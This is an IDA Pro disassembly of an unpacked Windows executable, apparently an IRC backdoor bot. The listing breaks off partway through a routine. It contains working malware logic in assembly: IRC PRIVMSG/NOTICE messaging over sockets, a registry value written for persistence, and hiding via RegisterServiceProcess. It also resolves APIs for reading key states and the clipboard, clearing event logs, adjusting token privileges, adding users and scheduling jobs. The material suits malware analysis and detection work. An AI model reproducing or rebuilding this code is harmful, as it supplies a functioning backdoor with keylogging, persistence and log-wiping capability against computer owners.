;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 72DCFCA66EC3E10B21F4FAC429654038
; File Name : u:\work\72dcfca66ec3e10b21f4fac429654038_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 000290F6 ( 168182.)
; Section size in file : 000290F6 ( 168182.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
; OS type : MS Windows
; Application type: Executable 32bit
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401000(char *Str)
sub_401000 proc near ; CODE XREF: WinMain(x,x,x,x)+342�p
; sub_41AEDD+1E�p
var_4 = dword ptr -4
Str = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
xor edi, edi
xor esi, esi
mov ebx, offset aLoghdriver ; "loghDriver"
loc_401010: ; CODE XREF: sub_401000+6A�j
push edi
lea eax, [ebp+var_4]
push eax
push edi
push 0F003Fh
push edi
push edi
push edi
push off_43C054[esi]
push dword_43C050[esi]
call dword_444150 ; RegCreateKeyExA
cmp [ebp+Str], edi
jz short loc_401051
push [ebp+Str] ; Str
call _strlen
pop ecx
push eax
push [ebp+Str]
push 1
push edi
push ebx
push [ebp+var_4]
call dword_4440E4 ; RegSetValueExA
jmp short loc_40105B
; ---------------------------------------------------------------------------
loc_401051: ; CODE XREF: sub_401000+33�j
push ebx
push [ebp+var_4]
call dword_444144 ; RegDeleteValueA
loc_40105B: ; CODE XREF: sub_401000+4F�j
push [ebp+var_4]
call dword_4441E8 ; RegCloseKey
add esi, 8
cmp esi, 18h
jb short loc_401010
pop edi
pop esi
pop ebx
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_401071 proc near ; CODE XREF: sub_40109F+54�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
or eax, 0FFFFFFFFh
test esi, esi
jz short loc_40109B
loc_401081: ; CODE XREF: sub_401071+28�j
xor edx, edx
mov dl, [ecx]
xor edx, eax
and edx, 0FFh
shr eax, 8
xor eax, ds:dword_42B230[edx*4]
inc ecx
dec esi
jnz short loc_401081
loc_40109B: ; CODE XREF: sub_401071+E�j
not eax
pop esi
retn
sub_401071 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40109F(char *)
sub_40109F proc near ; CODE XREF: sub_418F38+23E�p
var_10 = dword ptr -10h
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor ebx, ebx
push ebx ; char *
call _malloc
mov [esp+10h+var_10], offset aRb ; "rb"
push [esp+10h+arg_0] ; char *
mov esi, eax
call _fopen
mov edi, eax
test edi, edi
pop ecx
pop ecx
jnz short loc_4010EA
loc_4010C4: ; CODE XREF: sub_40109F+37�j
xor eax, eax
jmp short loc_40110B
; ---------------------------------------------------------------------------
loc_4010C8: ; CODE XREF: sub_40109F+4F�j
inc ebx
push ebx ; NewSize
push esi ; Memory
call _realloc
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_4010C4
push edi ; File
push 1 ; Count
lea eax, [esi+ebx-1]
push 1 ; ElementSize
push eax ; DstBuf
call _fread
add esp, 10h
loc_4010EA: ; CODE XREF: sub_40109F+23�j
test byte ptr [edi+0Ch], 10h
jz short loc_4010C8
dec ebx
push ebx
push esi
call sub_401071
push esi ; Memory
mov ebx, eax
call _free
push edi ; File
call _fclose
add esp, 10h
mov eax, ebx
loc_40110B: ; CODE XREF: sub_40109F+27�j
pop edi
pop esi
pop ebx
retn
sub_40109F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40110F proc near ; DATA XREF: WinMain(x,x,x,x)+14�o
var_2B8 = dword ptr -2B8h
var_25C = byte ptr -25Ch
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = word ptr -24h
Dst = dword ptr -10h
var_C = dword ptr -0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push dword_4444F4
call dword_444218 ; closesocket
call sub_40AFF6
call dword_444224 ; WSACleanup
call dword_444224 ; WSACleanup
mov ebx, ds:dword_42B014
push 64h
call ebx ; Sleep
push 10h ; Size
xor edi, edi
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
push 44h
pop esi
push esi ; Size
lea eax, [ebp+var_54]
push edi ; Val
push eax ; Dst
call _memset
add esp, 18h
mov [ebp+var_54], esi
mov esi, 104h
push esi
lea eax, [ebp+var_158]
push eax
mov [ebp+var_48], offset byte_42B633
mov [ebp+var_28], 1
mov [ebp+var_24], di
call ds:dword_42B010 ; GetSystemDirectoryA
push esi
lea eax, [ebp+var_25C]
push eax
push edi
call ds:dword_42B00C ; GetModuleFileNameA
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_158]
push eax
push edi
push 28h
push 1
push edi
push edi
lea eax, [ebp+var_25C]
push eax
push edi
call ds:dword_42B008 ; CreateProcessA
test eax, eax
jz short loc_4011D4
push 64h
call ebx ; Sleep
push [ebp+Dst]
mov esi, ds:dword_42B004
call esi ; CloseHandle
push [ebp+var_C]
call esi ; CloseHandle
loc_4011D4: ; CODE XREF: sub_40110F+AF�j
mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], offset dword_444060
mov eax, [esp+2B8h+var_2B8]
mov large fs:0, eax
add esp, 8
push edi
call ds:dword_42B000 ; ExitProcess
int 3 ; Trap to Debugger
sub_40110F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4011F5(int,char *Format,char Args)
sub_4011F5 proc near ; CODE XREF: sub_402472+3F�p
; sub_40274D+1A9�p ...
Dest = byte ptr -200h
arg_0 = dword ptr 8
Format = dword ptr 0Ch
Args = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+Args]
push eax ; Args
push [ebp+Format] ; Format
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __vsnprintf
add esp, 10h
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push [ebp+arg_0]
call dword_4441A0 ; send
leave
retn
sub_4011F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40123B(int,char *Str,int,int,int)
sub_40123B proc near ; CODE XREF: sub_401F92+40�p
; sub_401F92+74�p ...
var_400 = byte ptr -400h
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset Str ; "NOTICE"
jnz short loc_401256
mov edi, offset aPrivmsg ; "PRIVMSG"
loc_401256: ; CODE XREF: sub_40123B+14�j
push edi ; Str
call _strlen
push [ebp+Str] ; Str
mov esi, 1FAh
sub esi, eax
call _strlen
push [ebp+arg_8]
sub esi, eax
push offset aS ; "%s"
lea eax, [ebp+var_400]
push esi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+var_400]
push eax
push [ebp+Str]
lea eax, [ebp+Dest]
push edi
push offset Format ; "%s %s :%s\r\n"
push eax ; Dest
call _sprintf
add esp, 2Ch
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push [ebp+arg_0]
call dword_4441A0 ; send
cmp [ebp+arg_10], 0
pop edi
pop esi
jz short locret_4012D4
push 7D0h
call ds:dword_42B014 ; Sleep
locret_4012D4: ; CODE XREF: sub_40123B+8C�j
leave
retn
sub_40123B endp
; =============== S U B R O U T I N E =======================================
sub_4012D6 proc near ; CODE XREF: WinMain(x,x,x,x)+4B�p
push ebx
push ebp
mov ebp, ds:dword_42B024
push esi
push edi
push offset aKernel32_dll ; "kernel32.dll"
call ebp ; GetModuleHandleA
mov esi, ds:dword_42B020
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_4013F6
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; GetProcAddress
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov dword_4440D4, eax
call esi ; GetProcAddress
push offset aProcess32first ; "Process32First"
push edi
mov dword_4440F0, eax
call esi ; GetProcAddress
push offset aProcess32next ; "Process32Next"
push edi
mov dword_444154, eax
call esi ; GetProcAddress
push offset aModule32first ; "Module32First"
push edi
mov dword_4440A4, eax
call esi ; GetProcAddress
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov dword_444118, eax
call esi ; GetProcAddress
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov dword_4440FC, eax
call esi ; GetProcAddress
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov dword_4441A8, eax
call esi ; GetProcAddress
push offset aSearchpatha ; "SearchPathA"
push edi
mov dword_44407C, eax
call esi ; GetProcAddress
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov dword_444124, eax
call esi ; GetProcAddress
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov dword_44414C, eax
call esi ; GetProcAddress
cmp dword_4440D4, ebx
mov dword_4441B4, eax
jz short loc_4013D4
cmp dword_4440F0, ebx
jz short loc_4013D4
cmp dword_444154, ebx
jz short loc_4013D4
cmp dword_4440A4, ebx
jz short loc_4013D4
cmp dword_4440FC, ebx
jz short loc_4013D4
cmp dword_4441A8, ebx
jz short loc_4013D4
cmp dword_44407C, ebx
jz short loc_4013D4
cmp dword_444124, ebx
jz short loc_4013D4
cmp dword_44414C, ebx
jz short loc_4013D4
cmp eax, ebx
jnz short loc_4013DE
loc_4013D4: ; CODE XREF: sub_4012D6+B8�j
; sub_4012D6+C0�j ...
mov dword_444264, 1
loc_4013DE: ; CODE XREF: sub_4012D6+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_444208, eax
jz short loc_40140B
push 1
push ebx
call eax
jmp short loc_40140B
; ---------------------------------------------------------------------------
loc_4013F6: ; CODE XREF: sub_4012D6+1D�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov dword_444268, eax
mov dword_444264, 1
loc_40140B: ; CODE XREF: sub_4012D6+117�j
; sub_4012D6+11E�j
push offset aUser32_dll ; "user32.dll"
call ds:dword_42B018 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_401520
push offset aSendmessagea ; "SendMessageA"
push edi
call esi ; GetProcAddress
push offset aFindwindowa ; "FindWindowA"
push edi
mov dword_4441CC, eax
call esi ; GetProcAddress
push offset aIswindow ; "IsWindow"
push edi
mov dword_444160, eax
call esi ; GetProcAddress
push offset aDestroywindow ; "DestroyWindow"
push edi
mov dword_444084, eax
call esi ; GetProcAddress
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov dword_4440F8, eax
call esi ; GetProcAddress
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov dword_44409C, eax
call esi ; GetProcAddress
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov dword_44423C, eax
call esi ; GetProcAddress
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov dword_444080, eax
call esi ; GetProcAddress
cmp dword_4441CC, ebx
mov dword_4441A4, eax
jz short loc_4014C4
loc_401490: ; DATA XREF: .data:off_43F1F0�o
cmp dword_444160, ebx
jz short loc_4014C4
cmp dword_444084, ebx
jz short loc_4014C4
cmp dword_4440F8, ebx
jz short loc_4014C4
cmp dword_44409C, ebx
jz short loc_4014C4
cmp dword_44423C, ebx
jz short loc_4014C4
cmp dword_444080, ebx
jz short loc_4014C4
cmp eax, ebx
jnz short loc_4014CE
loc_4014C4: ; CODE XREF: sub_4012D6+1B8�j
; sub_4012D6+1C0�j ...
mov dword_44426C, 1
loc_4014CE: ; CODE XREF: sub_4012D6+1EC�j
push offset aGetasynckeysta ; "GetAsyncKeyState"
push edi
call esi ; GetProcAddress
push offset aGetkeystate ; "GetKeyState"
push edi
mov dword_4440A0, eax
call esi ; GetProcAddress
push offset aGetwindowtexta ; "GetWindowTextA"
push edi
mov dword_44422C, eax
call esi ; GetProcAddress
push offset aGetforegroundw ; "GetForegroundWindow"
push edi
mov dword_4440B0, eax
call esi ; GetProcAddress
cmp dword_4440A0, ebx
mov dword_4440C0, eax
jz short loc_40152B
cmp dword_44422C, ebx
jz short loc_40152B
cmp dword_4440B0, ebx
jz short loc_40152B
cmp eax, ebx
jnz short loc_401535
jmp short loc_40152B
; ---------------------------------------------------------------------------
loc_401520: ; CODE XREF: sub_4012D6+144�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov dword_444270, eax
loc_40152B: ; CODE XREF: sub_4012D6+232�j
; sub_4012D6+23A�j ...
mov dword_44426C, 1
loc_401535: ; CODE XREF: sub_4012D6+246�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_4016EE
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; GetProcAddress
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov dword_444238, eax
call esi ; GetProcAddress
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov dword_444150, eax
call esi ; GetProcAddress
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov dword_4440E4, eax
call esi ; GetProcAddress
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov dword_4440B8, eax
call esi ; GetProcAddress
push offset aRegclosekey ; "RegCloseKey"
push edi
mov dword_444144, eax
call esi ; GetProcAddress
push offset aOpeneventloga ; "OpenEventLogA"
push edi
mov dword_4441E8, eax
call esi ; GetProcAddress
push offset aCleareventloga ; "ClearEventLogA"
push edi
mov dword_444248, eax
call esi ; GetProcAddress
cmp dword_444238, ebx
mov dword_44411C, eax
jz short loc_4015DE
cmp dword_444150, ebx
jz short loc_4015DE
cmp dword_4440E4, ebx
jz short loc_4015DE
cmp dword_4440B8, ebx
jz short loc_4015DE
cmp dword_444144, ebx
jz short loc_4015DE
cmp dword_4441E8, ebx
jnz short loc_4015E8
loc_4015DE: ; CODE XREF: sub_4012D6+2DE�j
; sub_4012D6+2E6�j ...
mov dword_444274, 1
loc_4015E8: ; CODE XREF: sub_4012D6+306�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov dword_444244, eax
call esi ; GetProcAddress
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov dword_444228, eax
call esi ; GetProcAddress
cmp dword_444244, ebx
mov dword_444170, eax
jz short loc_401623
cmp dword_444228, ebx
jz short loc_401623
cmp eax, ebx
jnz short loc_40162D
loc_401623: ; CODE XREF: sub_4012D6+33F�j
; sub_4012D6+347�j
mov dword_444274, 1
loc_40162D: ; CODE XREF: sub_4012D6+34B�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; GetProcAddress
push offset aOpenservicea ; "OpenServiceA"
push edi
mov dword_4441C8, eax
call esi ; GetProcAddress
push offset aStartservicea ; "StartServiceA"
push edi
mov dword_44424C, eax
call esi ; GetProcAddress
push offset aControlservice ; "ControlService"
push edi
mov dword_4441D0, eax
call esi ; GetProcAddress
push offset aDeleteservice ; "DeleteService"
push edi
mov dword_4441EC, eax
call esi ; GetProcAddress
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov dword_4440F4, eax
call esi ; GetProcAddress
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov dword_444134, eax
call esi ; GetProcAddress
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov dword_4441D8, eax
call esi ; GetProcAddress
cmp dword_4441C8, ebx
mov dword_444204, eax
jz short loc_4016D1
cmp dword_44424C, ebx
jz short loc_4016D1
cmp dword_4441D0, ebx
jz short loc_4016D1
cmp dword_4441EC, ebx
jz short loc_4016D1
cmp dword_4440F4, ebx
jz short loc_4016D1
cmp dword_444134, ebx
jz short loc_4016D1
cmp dword_4441D8, ebx
jz short loc_4016D1
cmp eax, ebx
jnz short loc_4016DB
loc_4016D1: ; CODE XREF: sub_4012D6+3C5�j
; sub_4012D6+3CD�j ...
mov dword_444274, 1
loc_4016DB: ; CODE XREF: sub_4012D6+3F9�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_444198, eax
jnz short loc_401703
jmp short loc_4016F9
; ---------------------------------------------------------------------------
loc_4016EE: ; CODE XREF: sub_4012D6+26A�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov dword_444278, eax
loc_4016F9: ; CODE XREF: sub_4012D6+416�j
mov dword_444274, 1
loc_401703: ; CODE XREF: sub_4012D6+414�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_4017CF
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; GetProcAddress
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov dword_444250, eax
call esi ; GetProcAddress
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov dword_44421C, eax
call esi ; GetProcAddress
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov dword_444180, eax
call esi ; GetProcAddress
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov dword_444178, eax
call esi ; GetProcAddress
push offset aSelectobject ; "SelectObject"
push edi
mov dword_4441C0, eax
call esi ; GetProcAddress
push offset aBitblt ; "BitBlt"
push edi
mov dword_44408C, eax
call esi ; GetProcAddress
push offset aDeletedc ; "DeleteDC"
push edi
mov dword_444190, eax
call esi ; GetProcAddress
push offset aDeleteobject ; "DeleteObject"
push edi
mov dword_444130, eax
call esi ; GetProcAddress
cmp dword_444250, ebx
mov dword_444184, eax
jz short loc_4017DA
cmp dword_44421C, ebx
jz short loc_4017DA
cmp dword_444180, ebx
jz short loc_4017DA
cmp dword_444178, ebx
jz short loc_4017DA
cmp dword_4441C0, ebx
jz short loc_4017DA
cmp dword_44408C, ebx
jz short loc_4017DA
cmp dword_444190, ebx
jz short loc_4017DA
cmp dword_444130, ebx
jz short loc_4017DA
cmp eax, ebx
jnz short loc_4017E4
jmp short loc_4017DA
; ---------------------------------------------------------------------------
loc_4017CF: ; CODE XREF: sub_4012D6+438�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov dword_444280, eax
loc_4017DA: ; CODE XREF: sub_4012D6+4B9�j
; sub_4012D6+4C1�j ...
mov dword_44427C, 1
loc_4017E4: ; CODE XREF: sub_4012D6+4F5�j
mov ebp, ds:dword_42B018
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_401AA0
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; GetProcAddress
push offset aWsasocketa ; "WSASocketA"
push edi
mov dword_444110, eax
call esi ; GetProcAddress
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov dword_444074, eax
call esi ; GetProcAddress
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov dword_444194, eax
call esi ; GetProcAddress
push offset aWsaioctl ; "WSAIoctl"
push edi
mov dword_44415C, eax
call esi ; GetProcAddress
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov dword_4441E0, eax
call esi ; GetProcAddress
push offset aWsacleanup ; "WSACleanup"
push edi
mov dword_4441C4, eax
call esi ; GetProcAddress
push offset aSocket ; "socket"
push edi
mov dword_444224, eax
call esi ; GetProcAddress
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov dword_444100, eax
call esi ; GetProcAddress
push offset aConnect ; "connect"
push edi
mov dword_444094, eax
call esi ; GetProcAddress
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov dword_4440AC, eax
call esi ; GetProcAddress
push offset aInet_addr ; "inet_addr"
push edi
mov dword_444188, eax
call esi ; GetProcAddress
push offset aHtons ; "htons"
push edi
mov dword_44417C, eax
call esi ; GetProcAddress
push offset aHtonl ; "htonl"
push edi
mov dword_444260, eax
call esi ; GetProcAddress
push offset aNtohs ; "ntohs"
push edi
mov dword_444234, eax
call esi ; GetProcAddress
push offset aNtohl ; "ntohl"
push edi
mov dword_444200, eax
call esi ; GetProcAddress
push offset aSend ; "send"
push edi
mov dword_4441DC, eax
call esi ; GetProcAddress
push offset aSendto ; "sendto"
push edi
mov dword_4441A0, eax
call esi ; GetProcAddress
push offset aRecv ; "recv"
push edi
mov dword_4440CC, eax
call esi ; GetProcAddress
push offset aRecvfrom ; "recvfrom"
push edi
mov dword_444064, eax
call esi ; GetProcAddress
mov dword_444088, eax
push offset aBind ; "bind"
push edi
call esi ; GetProcAddress
push offset aSelect ; "select"
push edi
mov dword_4441E4, eax
call esi ; GetProcAddress
push offset aListen ; "listen"
push edi
mov dword_4441B0, eax
call esi ; GetProcAddress
push offset aAccept ; "accept"
push edi
mov dword_444230, eax
call esi ; GetProcAddress
push offset aSetsockopt ; "setsockopt"
push edi
mov dword_4440BC, eax
call esi ; GetProcAddress
push offset aGetsockname ; "getsockname"
push edi
mov dword_444120, eax
call esi ; GetProcAddress
push offset aGethostname ; "gethostname"
push edi
mov dword_444068, eax
call esi ; GetProcAddress
push offset aGethostbyname ; "gethostbyname"
push edi
mov dword_444220, eax
call esi ; GetProcAddress
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov dword_444168, eax
call esi ; GetProcAddress
push offset aGetpeername ; "getpeername"
push edi
mov dword_4441FC, eax
call esi ; GetProcAddress
push offset aClosesocket ; "closesocket"
push edi
mov dword_444148, eax
call esi ; GetProcAddress
cmp dword_444110, ebx
mov dword_444218, eax
jz loc_401AAB
cmp dword_444074, ebx
jz loc_401AAB
cmp dword_444194, ebx
jz loc_401AAB
cmp dword_4441E0, ebx
jz loc_401AAB
cmp dword_4441C4, ebx
jz loc_401AAB
cmp dword_444224, ebx
jz loc_401AAB
cmp dword_444100, ebx
jz loc_401AAB
cmp dword_444094, ebx
jz loc_401AAB
cmp dword_4440AC, ebx
jz loc_401AAB
cmp dword_444188, ebx
jz loc_401AAB
cmp dword_44417C, ebx
jz loc_401AAB
cmp dword_444260, ebx
jz loc_401AAB
cmp dword_444234, ebx
jz loc_401AAB
cmp dword_444200, ebx
jz short loc_401AAB
cmp dword_4441A0, ebx
jz short loc_401AAB
cmp dword_4440CC, ebx
jz short loc_401AAB
cmp dword_444064, ebx
jz short loc_401AAB
cmp dword_444088, ebx
jz short loc_401AAB
cmp dword_4441E4, ebx
jz short loc_401AAB
cmp dword_4441B0, ebx
jz short loc_401AAB
cmp dword_444230, ebx
jz short loc_401AAB
cmp dword_4440BC, ebx
jz short loc_401AAB
cmp dword_444120, ebx
jz short loc_401AAB
cmp dword_444068, ebx
jz short loc_401AAB
cmp dword_444220, ebx
jz short loc_401AAB
cmp dword_444168, ebx
jz short loc_401AAB
cmp dword_4441FC, ebx
jz short loc_401AAB
cmp eax, ebx
jnz short loc_401AB5
jmp short loc_401AAB
; ---------------------------------------------------------------------------
loc_401AA0: ; CODE XREF: sub_4012D6+51F�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov dword_444288, eax
loc_401AAB: ; CODE XREF: sub_4012D6+6BE�j
; sub_4012D6+6CA�j ...
mov dword_444284, 1
loc_401AB5: ; CODE XREF: sub_4012D6+7C6�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_401BBA
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; GetProcAddress
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov dword_444078, eax
call esi ; GetProcAddress
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov dword_44425C, eax
call esi ; GetProcAddress
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov dword_44412C, eax
call esi ; GetProcAddress
push offset aInternetconnec ; "InternetConnectA"
push edi
mov dword_444258, eax
call esi ; GetProcAddress
push offset aInternetopena ; "InternetOpenA"
push edi
mov dword_44413C, eax
call esi ; GetProcAddress
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov dword_444098, eax
call esi ; GetProcAddress
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov dword_444108, eax
call esi ; GetProcAddress
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov dword_444070, eax
call esi ; GetProcAddress
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov dword_4441B8, eax
call esi ; GetProcAddress
cmp dword_444078, ebx
mov ecx, dword_444098
mov dword_444164, eax
jz short loc_401B96
cmp dword_44425C, ebx
jz short loc_401B96
cmp dword_44412C, ebx
jz short loc_401B96
cmp dword_444258, ebx
jz short loc_401B96
cmp dword_44413C, ebx
jz short loc_401B96
cmp ecx, ebx
jz short loc_401B96
cmp dword_444108, ebx
jz short loc_401B96
cmp dword_444070, ebx
jz short loc_401B96
cmp dword_4441B8, ebx
jz short loc_401B96
cmp eax, ebx
jnz short loc_401BA0
loc_401B96: ; CODE XREF: sub_4012D6+87E�j
; sub_4012D6+886�j ...
mov dword_44428C, 1
loc_401BA0: ; CODE XREF: sub_4012D6+8BE�j
cmp ecx, ebx
jz short loc_401BD5
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx ; InternetOpenA
cmp eax, ebx
mov dword_444254, eax
jnz short loc_401BD5
jmp short loc_401BCF
; ---------------------------------------------------------------------------
loc_401BBA: ; CODE XREF: sub_4012D6+7EA�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov dword_444290, eax
mov dword_44428C, 1
loc_401BCF: ; CODE XREF: sub_4012D6+8E2�j
mov dword_444254, ebx
loc_401BD5: ; CODE XREF: sub_4012D6+8CC�j
; sub_4012D6+8E0�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_401C1F
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; GetProcAddress
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov dword_444158, eax
call esi ; GetProcAddress
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov dword_44418C, eax
call esi ; GetProcAddress
cmp dword_444158, ebx
mov dword_4441F4, eax
jz short loc_401C2A
cmp dword_44418C, ebx
jz short loc_401C2A
cmp eax, ebx
jnz short loc_401C34
jmp short loc_401C2A
; ---------------------------------------------------------------------------
loc_401C1F: ; CODE XREF: sub_4012D6+90A�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov dword_444298, eax
loc_401C2A: ; CODE XREF: sub_4012D6+939�j
; sub_4012D6+941�j ...
mov dword_444294, 1
loc_401C34: ; CODE XREF: sub_4012D6+945�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_401D3B
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; GetProcAddress
push offset aNetsharedel ; "NetShareDel"
push edi
mov dword_4440E8, eax
call esi ; GetProcAddress
push offset aNetshareenum ; "NetShareEnum"
push edi
mov dword_444104, eax
call esi ; GetProcAddress
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov dword_44420C, eax
call esi ; GetProcAddress
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov dword_4440A8, eax
call esi ; GetProcAddress
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov dword_444140, eax
call esi ; GetProcAddress
push offset aNetuseradd ; "NetUserAdd"
push edi
mov dword_44406C, eax
call esi ; GetProcAddress
push offset aNetuserdel ; "NetUserDel"
push edi
mov dword_4440C8, eax
call esi ; GetProcAddress
push offset aNetuserenum ; "NetUserEnum"
push edi
mov dword_4441D4, eax
call esi ; GetProcAddress
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov dword_4440E0, eax
call esi ; GetProcAddress
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov dword_4440EC, eax
call esi ; GetProcAddress
push offset aNetwkstagetinf ; "NetWkstaGetInfo"
push edi
mov dword_444114, eax
call esi ; GetProcAddress
cmp dword_4440E8, ebx
mov dword_4440DC, eax
jz short loc_401D46
cmp dword_444104, ebx
jz short loc_401D46
cmp dword_44420C, ebx
jz short loc_401D46
cmp dword_4440A8, ebx
jz short loc_401D46
cmp dword_444140, ebx
jz short loc_401D46
cmp dword_44406C, ebx
jz short loc_401D46
cmp dword_4440C8, ebx
jz short loc_401D46
cmp dword_4441D4, ebx
jz short loc_401D46
cmp dword_4440E0, ebx
jz short loc_401D46
cmp dword_4440EC, ebx
jz short loc_401D46
